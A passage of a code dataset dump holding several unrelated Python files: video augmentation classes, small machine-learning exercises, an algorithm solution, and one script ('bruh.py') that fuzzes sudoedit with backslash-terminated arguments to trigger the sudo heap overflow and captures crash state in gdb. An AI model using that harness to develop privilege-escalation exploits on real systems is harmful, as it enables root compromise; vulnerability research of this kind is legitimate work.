in results and results['backend'] == 'pyav':\n norm_imgs = paddle.to_tensor(norm_imgs, dtype=paddle.float32)\n results['imgs'] = norm_imgs\n return results\n\n\n@PIPELINES.register()\nclass JitterScale(object):\n \"\"\"\n Scale image, while the target short size is randomly select between min_size and max_size.\n Args:\n min_size: Lower bound for random sampler.\n max_size: Higher bound for random sampler.\n \"\"\"\n def __init__(self,\n min_size,\n max_size,\n short_cycle_factors=[0.5, 0.7071],\n default_min_size=256):\n self.default_min_size = default_min_size\n self.orig_min_size = self.min_size = min_size\n self.max_size = max_size\n self.short_cycle_factors = short_cycle_factors\n\n def __call__(self, results):\n \"\"\"\n Performs jitter resize operations.\n Args:\n imgs (Sequence[PIL.Image]): List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n resized_imgs: List where each item is a PIL.Image after scaling.\n \"\"\"\n short_cycle_idx = results.get('short_cycle_idx')\n if short_cycle_idx in [0, 1]:\n self.min_size = int(\n round(self.short_cycle_factors[short_cycle_idx] *\n self.default_min_size))\n else:\n self.min_size = self.orig_min_size\n\n imgs = results['imgs']\n size = int(round(np.random.uniform(self.min_size, self.max_size)))\n assert (len(imgs) >= 1), \\\n \"len(imgs):{} should be larger than 1\".format(len(imgs))\n\n if 'backend' in results and results['backend'] == 'pyav':\n height, width = imgs.shape[2:]\n else:\n width, height = 
imgs[0].size\n if (width <= height and width == size) or (height <= width\n and height == size):\n return results\n\n new_width = size\n new_height = size\n if width < height:\n new_height = int(math.floor((float(height) / width) * size))\n else:\n new_width = int(math.floor((float(width) / height) * size))\n\n if 'backend' in results and results['backend'] == 'pyav':\n frames_resize = F.interpolate(imgs,\n size=(new_height, new_width),\n mode=\"bilinear\",\n align_corners=False) # [c,t,h,w]\n else:\n frames_resize = []\n for j in range(len(imgs)):\n img = imgs[j]\n scale_img = img.resize((new_width, new_height), Image.BILINEAR)\n frames_resize.append(scale_img)\n\n results['imgs'] = frames_resize\n return results\n\n\n@PIPELINES.register()\nclass MultiCrop(object):\n \"\"\"\n Random crop image.\n This operation can perform multi-crop during multi-clip test, as in slowfast model.\n Args:\n target_size(int): Random crop a square with the target_size from an image.\n \"\"\"\n def __init__(self,\n target_size,\n default_crop_size=224,\n short_cycle_factors=[0.5, 0.7071],\n test_mode=False):\n self.orig_target_size = self.target_size = target_size\n self.short_cycle_factors = short_cycle_factors\n self.default_crop_size = default_crop_size\n self.test_mode = test_mode\n\n def __call__(self, results):\n \"\"\"\n Performs random crop operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n crop_imgs: List where each item is a PIL.Image after random crop.\n \"\"\"\n imgs = results['imgs']\n spatial_sample_index = results['spatial_sample_index']\n spatial_num_clips = results['spatial_num_clips']\n\n short_cycle_idx = results.get('short_cycle_idx')\n if short_cycle_idx in [0, 1]:\n self.target_size = int(\n round(self.short_cycle_factors[short_cycle_idx] *\n self.default_crop_size))\n else:\n self.target_size = self.orig_target_size # use saved value before call\n\n w, h = imgs[0].size\n if w == self.target_size and h == self.target_size:\n return results\n\n assert (w >= self.target_size) and (h >= self.target_size), \\\n \"image width({}) and height({}) should be larger than crop size({},{})\".format(w, h, self.target_size, self.target_size)\n frames_crop = []\n if not self.test_mode:\n x_offset = random.randint(0, w - self.target_size)\n y_offset = random.randint(0, h - self.target_size)\n else: # multi-crop\n x_gap = int(\n math.ceil((w - self.target_size) / (spatial_num_clips - 1)))\n y_gap = int(\n math.ceil((h - self.target_size) / (spatial_num_clips - 1)))\n if h > w:\n x_offset = int(math.ceil((w - self.target_size) / 2))\n if spatial_sample_index == 0:\n y_offset = 0\n elif spatial_sample_index == spatial_num_clips - 1:\n y_offset = h - self.target_size\n else:\n y_offset = y_gap * spatial_sample_index\n else:\n y_offset = int(math.ceil((h - self.target_size) / 2))\n if spatial_sample_index == 0:\n x_offset = 0\n elif spatial_sample_index == spatial_num_clips - 1:\n x_offset = w - self.target_size\n else:\n x_offset = x_gap * spatial_sample_index\n\n for img in imgs:\n nimg = img.crop((x_offset, y_offset, x_offset + self.target_size,\n y_offset + self.target_size))\n frames_crop.append(nimg)\n results['imgs'] = frames_crop\n return results\n\n\n@PIPELINES.register()\nclass PackOutput(object):\n \"\"\"\n In slowfast model, we want to get slow pathway from fast pathway based on\n alpha factor.\n Args:\n alpha(int): temporal length of fast/slow\n \"\"\"\n def __init__(self, alpha):\n self.alpha = alpha\n\n def 
__call__(self, results):\n fast_pathway = results['imgs']\n\n # sample num points between start and end\n slow_idx_start = 0\n slow_idx_end = fast_pathway.shape[0] - 1\n slow_idx_num = fast_pathway.shape[0] // self.alpha\n slow_idxs_select = np.linspace(slow_idx_start, slow_idx_end,\n slow_idx_num).astype(\"int64\")\n slow_pathway = fast_pathway[slow_idxs_select]\n\n # T H W C -> C T H W.\n slow_pathway = slow_pathway.transpose(3, 0, 1, 2)\n fast_pathway = fast_pathway.transpose(3, 0, 1, 2)\n\n # slow + fast\n frames_list = [slow_pathway, fast_pathway]\n results['imgs'] = frames_list\n return results\n\n\n@PIPELINES.register()\nclass GroupFullResSample(object):\n def __init__(self, crop_size, flip=False):\n self.crop_size = crop_size if not isinstance(crop_size, int) else (\n crop_size, crop_size)\n self.flip = flip\n\n def __call__(self, results):\n img_group = results['imgs']\n\n image_w, image_h = img_group[0].size\n crop_w, crop_h = self.crop_size\n\n w_step = (image_w - crop_w) // 4\n h_step = (image_h - crop_h) // 4\n\n offsets = list()\n offsets.append((0 * w_step, 2 * h_step)) # left\n offsets.append((4 * w_step, 2 * h_step)) # right\n offsets.append((2 * w_step, 2 * h_step)) # center\n\n oversample_group = list()\n for o_w, o_h in offsets:\n normal_group = list()\n flip_group = list()\n for i, img in enumerate(img_group):\n crop = img.crop((o_w, o_h, o_w + crop_w, o_h + crop_h))\n normal_group.append(crop)\n if self.flip:\n flip_crop = crop.copy().transpose(Image.FLIP_LEFT_RIGHT)\n flip_group.append(flip_crop)\n\n oversample_group.extend(normal_group)\n if self.flip:\n oversample_group.extend(flip_group)\n\n results['imgs'] = oversample_group\n return results\n\n\n@PIPELINES.register()\nclass TenCrop:\n \"\"\"\n Crop out 5 regions (4 corner points + 1 center point) from the picture,\n and then flip the cropping result to get 10 cropped images, which can make the prediction result more robust.\n Args:\n target_size(int | tuple[int]): (w, h) of target size for crop.\n \"\"\"\n def __init__(self, target_size):\n self.target_size = (target_size, target_size)\n\n def __call__(self, results):\n imgs = results['imgs']\n img_w, img_h = imgs[0].size\n crop_w, crop_h = self.target_size\n w_step = (img_w - crop_w) // 4\n h_step = (img_h - crop_h) // 4\n offsets = [\n (0, 0),\n (4 * w_step, 0),\n (0, 4 * h_step),\n (4 * w_step, 4 * h_step),\n (2 * w_step, 2 * h_step),\n ]\n img_crops = list()\n for x_offset, y_offset in offsets:\n crop = [\n img.crop(\n (x_offset, y_offset, x_offset + crop_w, y_offset + crop_h))\n for img in imgs\n ]\n crop_fliped = [\n timg.transpose(Image.FLIP_LEFT_RIGHT) for timg in crop\n ]\n img_crops.extend(crop)\n img_crops.extend(crop_fliped)\n\n results['imgs'] = img_crops\n return results\n\n\n@PIPELINES.register()\nclass UniformCrop:\n \"\"\"\n Perform uniform spatial sampling on the images,\n select the two ends of the long side and the middle position (left middle right or top middle bottom) 3 regions.\n Args:\n target_size(int | tuple[int]): (w, h) of target size for crop.\n \"\"\"\n def __init__(self, target_size, backend='cv2'):\n if isinstance(target_size, tuple):\n self.target_size = target_size\n elif isinstance(target_size, int):\n self.target_size = (target_size, target_size)\n else:\n raise TypeError(\n f'target_size must be int or tuple[int], but got {type(target_size)}'\n )\n self.backend = backend\n\n def __call__(self, results):\n\n imgs = results['imgs']\n if 'backend' in results and results['backend'] == 'pyav': # [c,t,h,w]\n img_h, img_w = 
imgs.shape[2:]\n elif self.backend == 'pillow':\n img_w, img_h = imgs[0].size\n else:\n img_h, img_w = imgs[0].shape[:2]\n\n crop_w, crop_h = self.target_size\n if crop_h == img_h:\n w_step = (img_w - crop_w) // 2\n offsets = [\n (0, 0),\n (w_step * 2, 0),\n (w_step, 0),\n ]\n elif crop_w == img_w:\n h_step = (img_h - crop_h) // 2\n offsets = [\n (0, 0),\n (0, h_step * 2),\n (0, h_step),\n ]\n else:\n raise ValueError(\n f\"img_w({img_w}) == crop_w({crop_w}) or img_h({img_h}) == crop_h({crop_h})\"\n )\n img_crops = []\n if 'backend' in results and results['backend'] == 'pyav': # [c,t,h,w]\n for x_offset, y_offset in offsets:\n crop = imgs[:, :, y_offset:y_offset + crop_h,\n x_offset:x_offset + crop_w]\n img_crops.append(crop)\n img_crops = paddle.concat(img_crops, axis=1)\n else:\n if self.backend == 'pillow':\n for x_offset, y_offset in offsets:\n crop = [\n img.crop((x_offset, y_offset, x_offset + crop_w,\n y_offset + crop_h)) for img in imgs\n ]\n img_crops.extend(crop)\n else:\n for x_offset, y_offset in offsets:\n crop = [\n img[y_offset:y_offset + crop_h,\n x_offset:x_offset + crop_w] for img in imgs\n ]\n img_crops.extend(crop)\n results['imgs'] = img_crops\n return results\n\n\n@PIPELINES.register()\nclass GroupResize(object):\n def __init__(self, height, width, scale, K, mode='train'):\n self.height = height\n self.width = width\n self.scale = scale\n self.resize = {}\n self.K = np.array(K, dtype=np.float32)\n self.mode = mode\n for i in range(self.scale):\n s = 2**i\n self.resize[i] = paddle.vision.transforms.Resize(\n (self.height // s, self.width // s), interpolation='lanczos')\n\n def __call__(self, results):\n if self.mode == 'infer':\n imgs = results['imgs']\n for k in list(imgs): # (\"color\", 0, -1)\n if \"color\" in k or \"color_n\" in k:\n n, im, _ = k\n for i in range(self.scale):\n imgs[(n, im, i)] = self.resize[i](imgs[(n, im, i - 1)])\n else:\n imgs = results['imgs']\n for scale in range(self.scale):\n K = self.K.copy()\n\n K[0, :] *= self.width // (2**scale)\n K[1, :] *= self.height // (2**scale)\n\n inv_K = np.linalg.pinv(K)\n imgs[(\"K\", scale)] = K\n imgs[(\"inv_K\", scale)] = inv_K\n\n for k in list(imgs):\n if \"color\" in k or \"color_n\" in k:\n n, im, i = k\n for i in range(self.scale):\n imgs[(n, im, i)] = self.resize[i](imgs[(n, im, i - 1)])\n\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass ColorJitter(object):\n \"\"\"Randomly change the brightness, contrast, saturation and hue of an image.\n \"\"\"\n def __init__(self,\n brightness=0,\n contrast=0,\n saturation=0,\n hue=0,\n mode='train',\n p=0.5,\n keys=None):\n self.mode = mode\n self.colorjitter = paddle.vision.transforms.ColorJitter(\n brightness, contrast, saturation, hue)\n self.p = p\n\n def __call__(self, results):\n \"\"\"\n Args:\n results (PIL Image): Input image.\n\n Returns:\n PIL Image: Color jittered image.\n \"\"\"\n\n do_color_aug = random.random() > self.p\n imgs = results['imgs']\n for k in list(imgs):\n f = imgs[k]\n if \"color\" in k or \"color_n\" in k:\n n, im, i = k\n imgs[(n, im, i)] = f\n if do_color_aug:\n imgs[(n + \"_aug\", im, i)] = self.colorjitter(f)\n else:\n imgs[(n + \"_aug\", im, i)] = f\n if self.mode == \"train\":\n for i in results['frame_idxs']:\n del imgs[(\"color\", i, -1)]\n del imgs[(\"color_aug\", i, -1)]\n del imgs[(\"color_n\", i, -1)]\n del imgs[(\"color_n_aug\", i, -1)]\n else:\n for i in results['frame_idxs']:\n del imgs[(\"color\", i, -1)]\n del imgs[(\"color_aug\", i, -1)]\n\n results['img'] = imgs\n return 
results\n\n\n@PIPELINES.register()\nclass GroupRandomFlip(object):\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, results):\n\n imgs = results['imgs']\n do_flip = random.random() > self.p\n if do_flip:\n for k in list(imgs):\n if \"color\" in k or \"color_n\" in k:\n n, im, i = k\n imgs[(n, im,\n i)] = imgs[(n, im,\n i)].transpose(Image.FLIP_LEFT_RIGHT)\n if \"depth_gt\" in imgs:\n imgs['depth_gt'] = np.array(np.fliplr(imgs['depth_gt']))\n\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass ToArray(object):\n def __init__(self):\n pass\n\n def __call__(self, results):\n imgs = results['imgs']\n for k in list(imgs):\n if \"color\" in k or \"color_n\" in k or \"color_aug\" in k or \"color_n_aug\" in k:\n n, im, i = k\n imgs[(n, im,\n i)] = np.array(imgs[(n, im, i)]).astype('float32') / 255.0\n imgs[(n, im, i)] = imgs[(n, im, i)].transpose((2, 0, 1))\n if \"depth_gt\" in imgs:\n imgs['depth_gt'] = np.array(imgs['depth_gt']).astype('float32')\n\n results['imgs'] = imgs\n return results\n","repo_name":"PaddlePaddle/awesome-DeepLearning","sub_path":"Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":37238,"program_lang":"python","lang":"en","doc_type":"code","stars":2544,"dataset":"github-code","pt":"37"} +{"seq_id":"27967906771","text":"import numpy as np\nimport pylab as plt\n\n\ndef convert_label(image_num):\n\tlabels = np.loadtxt(\"imagenet_labels/imagenet_labels.csv\", delimiter = \",\", dtype = \"str\")\n\torder = np.loadtxt(\"imagenet_labels/labels_list.csv\", delimiter = \",\", dtype = \"str\")\n\tlabel = order[image_num-1]\n\tif image_num.shape:\n\t\tall_labels = []\n\t\tfor l in label:\n\t\t\tall_labels.append((labels[np.where(labels[:,0] == l)[0]])[0,1])\n\t\tprint(all_labels)\n\telse:\n\t\tprint(labels[np.where(labels[:,0] == label)[0]])\n\n\n\nif __name__ == '__main__':\n\tconvert_label(np.array(241))\n\tconvert_label(np.array([241,2,4]))","repo_name":"jaredsfrank/AdversaryResearch","sub_path":"convert_label.py","file_name":"convert_label.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21591371901","text":"#!/usr/bin/env python\n\nfrom itertools import permutations\nimport time\nimport os\nimport subprocess\nimport pwn\nimport sys\nfrom shlex import split, join\n\ndef getc(l):\n return pwn.cyclic(l, n=8).decode('utf-8')\n\ndef doit(envl, bufl, i):\n e = getc(envl)\n b = getc(bufl)\n c = \"-A -s '{}\\\\{}\\\\'\".format(b, e)\n s = split(\"env -i EDITOR=/usr/bin/false 'SUDO={}{}\\\\' /usr/bin/sudoedit {}\".format('\\\\'*envl, e, c))\n\n output = subprocess.run(s, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)\n\n if output.returncode == -6:\n sys.stdout.write(\".\")\n return\n\n if b\"File name too long\" in output.stderr:\n sys.stdout.write(\"!\")\n return\n\n if output.returncode != -127:\n with open('iteration_{}-{}-{}_code_{}.txt'.format(i,envl, bufl, abs(output.returncode)), 'wb') as fh:\n fh.write(output.stderr)\n fh.write(bytes(join(s), 'utf8'))\n\n gdbscript = 'iteration_{}-{}-{}_code_{}.py'.format(i,envl, bufl, abs(output.returncode))\n\n with open(gdbscript, 'wb') as fh:\n print(e,b, 'iteration_{}-{}-{}_code_{}.py'.format(i,envl, bufl, abs(output.returncode)))\n fh.write(b'import gdb\\n')\n fh.write(b'gdb.execute(\"unset environment\")\\n')\n fh.write(b'gdb.execute(\"set environment 
EDITOR=/usr/bin/false\")\\n')\n fh.write(bytes('gdb.execute(\"set environment SUDO=\\'{}{}\\\\\\\\\\'\")\\n'.format('\\\\\\\\'*envl, getc(envl)), 'utf8'))\n fh.write(b'gdb.execute(\"file /usr/bin/sudoedit\")\\n')\n fh.write(bytes('gdb.execute(\"r -A -s \\'{}\\\\\\\\{}\\\\\\\\\\'\")\\n'.format(b,e), 'utf8'))\n fh.write(b'try:\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_env\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"show environment\", to_string=True),\"utf-8\"))\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_bt\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"bt full\", to_string=True), \"utf-8\"))\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_ir\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"i r\", to_string=True), \"utf-8\"))\\n')\n fh.write(bytes(' with open(\"iteration_{}-{}-{}_code_{}_gdb_heap\", \"wb\") as fh:\\n'.format(i,envl, bufl, abs(output.returncode)), 'utf-8'))\n fh.write(b' fh.write(bytes(gdb.execute(\"heap chunks\", to_string=True), \"utf-8\"))\\n')\n fh.write(b'except Exception:\\n')\n fh.write(b' pass\\n')\n fh.write(b'gdb.execute(\"quit\")\\n')\n os.fsync(fh)\n subprocess.check_output(\"/usr/bin/gdb -q -x {}\".format(gdbscript), timeout=4, shell=True)\n\nif __name__ == '__main__':\n perm = permutations(range(1,500), 2)\n i = 0\n\n for j in list(perm):\n i=i+1\n doit(j[1], j[0], i)\n","repo_name":"ArchiMoebius/snippets","sub_path":"python/bruh.py","file_name":"bruh.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23727371776","text":"\r\n\r\n#GRADIENTE DESCENDENTE PARA RESOLVER EL PROBLEMA DE REGRESION LINEAL\r\n#Agregar al programa instrucciones que muestren lo siguiente gráficamente:\r\n\r\nfrom numpy import *\r\nfrom matplotlib import pyplot as plt\r\ndef gradient_descent(alpha, x, y, ep, max_iter):\r\n convergio = False\r\n iter = 0\r\n N = len(x) #-- número de ejemplos\r\n #-- valores iniciales de theta\r\n t0 = 0\r\n t1 = 0\r\n #-- error total, J(theta)\r\n J = sum([(t0 + t1*x[i] - y[i])**2 for i in range(N)])\r\n #-- ciclo de iteraciones\r\n #lista_obtenida[0]=lista de t0\r\n #lista_obtenida[1]=lista de t1\r\n #lista_obtenida[2]=lista de error\r\n #lista_obtenida[3]=lista de iteraciones\r\n lista_obtenida = [[],[],[],[]]\r\n while not convergio:\r\n #-- para cada ejemplo de entrenamiento calcular el gradiente (d/d_theta)j(theta)\r\n grad0 = 1.0/N * sum([(t0 + t1*x[i] - y[i]) for i in range(N)])\r\n grad1 = 1.0/N * sum([(t0 + t1*x[i] - y[i])*x[i] for i in range(N)])\r\n #-- actualizar las thetas temporales\r\n temp0 = t0 - alpha * grad0\r\n temp1 = t1 - alpha * grad1\r\n #-- actualizar las theta\r\n t0 = temp0\r\n t1 = temp1\r\n lista_obtenida[0].append(t0)\r\n lista_obtenida[1].append(t1)\r\n #-- calcula el error cuadrado medio\r\n e = sum( [(t0 + t1*x[i] - y[i])**2 for i in range(N)] )\r\n if abs(J-e) <= ep:\r\n print ('Convergió con iteraciones: ', iter, '!!!')\r\n convergio = True\r\n J = e #-- actualizar error\r\n iter += 1 #-- incrementa iteraciones\r\n lista_obtenida[2].append(e)\r\n lista_obtenida[3].append(iter)\r\n if iter == max_iter: #-- si no converge\r\n print ('Se excedió del máximo de iteraciones!')\r\n convergio = True \r\n return t0,t1,lista_obtenida #-- 
devuelve los valores calculados de theta0 y theta1\r\n#------- programa principal--------------\r\n#-- lee puntos de muestra del archivo data.csv\r\npuntos = genfromtxt(\"data.csv\", delimiter=\",\")\r\n#-- las coordenadas x en el arreglo x, las coordenadas y en el arreglo y\r\nx = []\r\ny = []\r\nN = len(puntos) #-- nro de puntos\r\nprint(\"Nro de datos leidos: \", N)\r\nfor i in range(N):\r\n x.append(puntos[i,0])\r\n y.append(puntos[i,1])\r\n#-- parametros iniciales\r\nalfa= 0.0001 #-- learning rate\r\nep = 0.00001 #-- tolerancia\r\nmax_itera= 1000000 #-- nro maximo de iteraciones\r\n#-- comienza el gradiente descendente\r\ntetha0, tetha1, lista_para_graficar = gradient_descent(alfa,x,y,ep,max_itera)\r\n#-- mostrar resultados\r\nprint('Theta0: ',tetha0)\r\nprint('Theta1: ',tetha1)\r\n\r\n\r\n#PARTE A : Error Cuadrado Medio versus el número de iteraciones.\r\nimport numpy as np\r\nplt.figure(figsize=(10,6))\r\nplt.plot(lista_para_graficar[3], lista_para_graficar[2])\r\nplt.xlabel('Numero de iteraciones')\r\nplt.ylabel('Error cuadrado medio')\r\nplt.title('Error cuadrado medio VS Numero de iteraciones')\r\nplt.grid(True)\r\n\r\n#PARTE B : Los valores de θ1 y θ0 versus el número de iteraciones.\r\nplt.figure(figsize=(10,6))\r\nplt.plot(lista_para_graficar[3], lista_para_graficar[0], label='θ0 vs iteraciones')\r\nplt.plot(lista_para_graficar[3], lista_para_graficar[1], label='θ1 vs iteraciones')\r\nplt.xlabel('Numero de iteraciones')\r\nplt.ylabel('Valores de Theta')\r\nplt.title('θ0 y θ1 VS el número de iteraciones')\r\nplt.legend()\r\nplt.grid(True)\r\n","repo_name":"cesarodrigo21/DeepLearning","sub_path":"T1/tarea.py","file_name":"tarea.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70531926189","text":"# -*- coding: utf-8 -*-\n# UTF-8 encoding when using korean\nfrom pip._vendor.distlib.compat import raw_input\n\nage = input(\"나이를 입력해 주세요: \")\n#=> 20 입력\nprint(age)\n#=> 20 출력\n\nname = raw_input(\"이름을 입력해 주세요 : \")\n#=>홍길동 입력\nprint(name)\n#=>홍길동 출력","repo_name":"EricSeokgon/pythonRun","sub_path":"chapter2/sec02.py","file_name":"sec02.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39634773021","text":"import tensorflow as tf\nimport numpy as np\n\nx = tf.placeholder(shape=[5], dtype=tf.float32)\ny = tf.placeholder(shape=[], dtype=tf.float32)\n\ntrain_size = 1000\nx_vals = np.random.randn(5, train_size)\n# x_vals=np.linspace(0,1,train_size)\ny_vals = 1 * x_vals[0] + 2 * x_vals[1] + 3 * x_vals[2] + 4 * x_vals[3] + 5 * x_vals[4] + 10\n\nA = tf.Variable(tf.random_normal(shape=[5]))\nB = tf.Variable(tf.random_normal(shape=[]))\ntemp = 0\nfor i in range(5):\n temp += A[i] * x[i]\ntemp += B\nmodel_output = temp\n\ninit = tf.global_variables_initializer()\nlearning_rate = 0.1\nmy_opt = tf.train.GradientDescentOptimizer(learning_rate)\nloss = tf.reduce_mean(tf.square(model_output - y))\ntrain = my_opt.minimize(loss)\n\nsess = tf.Session()\nsess.run(init)\n\nprint('initial: A=' + str(sess.run(A)) + ' B=' + str(sess.run(B)))\nfor i in range(train_size):\n sess.run(train, feed_dict={x: x_vals[:, i], y: y_vals[i]})\nprint('training: A=' + str(sess.run(A)) + ' B=' + 
str(sess.run(B)))\n","repo_name":"LikeFishInWater/python","sub_path":"test_batch.py","file_name":"test_batch.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32836381750","text":"import jax\nfrom jax import numpy as jnp\nfrom jax.scipy.special import logsumexp\nfrom policies_disc.agents.DQN import DQN\nfrom policies_disc.networks.gaussian import Gaussian as Network\n\n\nclass DoubleGum(DQN):\n def __init__(self, obs, num_actions, args):\n self.network_fn = lambda obs: Network(num_actions, args.network, args.network_groups)(obs)\n self.initialize_all(obs, args)\n\n\n def beta_log_sum_exp(self, info):\n locs = info.pop('q')\n std = info.pop('std')\n spread = std * jnp.sqrt(3) / jnp.pi\n exponents = locs / spread\n log_sum_exp = logsumexp(exponents, axis=-1)\n return log_sum_exp.squeeze(), spread.squeeze()\n\n\n def soft_v(self, state, seed, obs):\n info = self.network_model_apply(state.target.network, state.network.sn_state, seed, obs)[0]\n log_sum_exp, spread = self.beta_log_sum_exp(info)\n return spread * log_sum_exp\n\n\n def target_network(self, state):\n info = self.network(self.state.target.network, self.state.network.sn_state, self.rngs.get_key(), state)[0]\n log_sum_exp, spread = self.beta_log_sum_exp(info)\n return spread * log_sum_exp\n\n\n def network_loss(self, params, state, batch, seed):\n state = jax.lax.stop_gradient(state)\n seed1, seed2 = jax.random.split(seed)\n\n target_Q = self.soft_v(state, seed1, batch['next_obs'])\n discount = self.args.discount ** self.args.nstep\n done = 1. - batch['done'].squeeze()\n target_Q = done * discount * target_Q\n target_Q = batch['rew'].squeeze() + target_Q\n\n online_info, sn_state = self.network_model_apply(params, state.network.sn_state, seed2, batch['obs'], update_stats=True)\n online_Q = online_info.pop('q')\n online_std = online_info.pop('std').squeeze()\n action = batch['act'].squeeze().astype(int)\n online_Q = online_Q[self.index, action]\n\n std_sg = jax.lax.stop_gradient(online_std)\n td_loss = online_Q - target_Q\n loss = jnp.log(online_std) + .5 * (td_loss / online_std) ** 2.\n loss = std_sg * loss\n loss_mean = loss.mean()\n loss_std = loss.std()\n\n aux = {\n 'td_loss' : td_loss.mean(),\n 'td_loss_std': td_loss.std(),\n 'sn_state' : sn_state,\n 'loss' : loss_mean,\n 'loss_std' : loss_std,\n\n 'target_Q_mean': target_Q.mean(),\n 'online_Q' : online_Q.mean(),\n 'target_Q_std' : target_Q.std(),\n 'online_Q_std' : online_Q.std(),\n }\n return loss_mean, aux\n\n\n def _td_loss(self, state, batch, seed):\n state = jax.lax.stop_gradient(state)\n seed1, seed2 = jax.random.split(seed)\n\n target_Q = self.soft_v(state, seed1, batch['next_obs'])\n discount = self.args.discount ** self.args.nstep\n done = 1. 
- batch['done'].squeeze()\n target_Q = done * discount * target_Q\n target_Q = batch['rew'].squeeze() + target_Q\n\n online_info, sn_state = self.network_model_apply(state.network.params, state.network.sn_state, seed2, batch['obs'], update_stats=True)\n online_Q = online_info.pop('q')\n online_std = online_info.pop('std').squeeze()\n action = batch['act'].squeeze().astype(int)\n online_Q = online_Q[self.td_index, action]\n\n aux = {\n 'target_Q': target_Q,\n 'online_Q': online_Q,\n 'online_std': online_std,\n 'done': done\n }\n return aux\n","repo_name":"dyth/doublegum","sub_path":"policies_disc/agents/DoubleGum.py","file_name":"DoubleGum.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"6308241811","text":"import unittest\nfrom typing import List\n\nclass Solution:\n def fourSumCount(self, A: List[int], B: List[int], C: List[int], D: List[int]) -> int:\n m = {}\n res = 0\n for a in A:\n for b in B:\n m[a + b] = m.get(a + b, 0) + 1\n\n for c in C:\n for d in D:\n res += m.get(-(c + d), 0)\n\n return res\n\n def kSumCount(self, lists: List[List[int]]) -> int:\n m = {}\n\n # This method populates the first half of lists into m\n def addToHash(lists, idx, sum):\n if idx == len(lists) // 2:\n m[sum] = m.get(sum, 0) + 1\n else:\n for a in lists[idx]:\n addToHash(lists, idx + 1, sum + a)\n\n def countComplements(lists, idx, complement):\n # reach the end of the lists\n if idx == len(lists):\n return m.get(complement, 0)\n else:\n cnt = 0\n for b in lists[idx]:\n cnt += countComplements(lists, idx + 1, complement - b)\n return cnt\n \n addToHash(lists, 0, 0)\n return countComplements(lists, len(lists) // 2, 0)\n \n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n\n def test_1(self):\n \n nums1 = [1, 2] \n nums2 = [-2, -1] \n nums3 = [-1, 2] \n nums4 = [0, 2]\n expect = 2\n # actual = self.solution.fourSumCount(nums1, nums2, nums3, nums4)\n # self.assertEqual(expect, actual)\n actual = self.solution.kSumCount([nums1, nums2, nums3, nums4])\n self.assertEqual(expect, actual)\n\n def test_2(self):\n \n nums1 = [0 for i in range(200)] \n nums2 = [0 for i in range(200)] \n nums3 = [0 for i in range(200)] \n nums4 = [0 for i in range(200)]\n expect = 200 * 200 * 200 * 200\n # actual = self.solution.fourSumCount(nums1, nums2, nums3, nums4)\n # self.assertEqual(expect, actual)\n actual = self.solution.kSumCount([nums1, nums2, nums3, nums4])\n self.assertEqual(expect, actual)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"oscarchang1226/programming-challenges","sub_path":"leetcode/4sum-ii/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10466008092","text":"import copy\n\n\ndef la_place(matrix):\n var = copy.deepcopy(matrix)\n if len(var) == 2:\n return var[0][0] * var[1][1] - var[0][1] * var[1][0]\n\n g = -1\n det = 0\n\n for i in range(len(var)):\n g *= -1\n if matrix[0][i] == 0:\n continue\n det += g * matrix[0][i] * la_place(scale_down(var, i))\n return det\n\n\ndef scale_down(matrix, i):\n var = copy.deepcopy(matrix)\n if len(var) > 2:\n var.pop(0)\n for x in range(len(var)):\n var[x].pop(i)\n return var\n\n\na = [[0, 0, 0, 3, 2, 3],\n [1, 3, 2, 2, 2, 5],\n [9, 9, 9, 3, 3, 6],\n [9, 9, 9, 4, 5, 7],\n [1, 2, 3, 5, 4, 5],\n [2, 6, 2, 3, 4, 
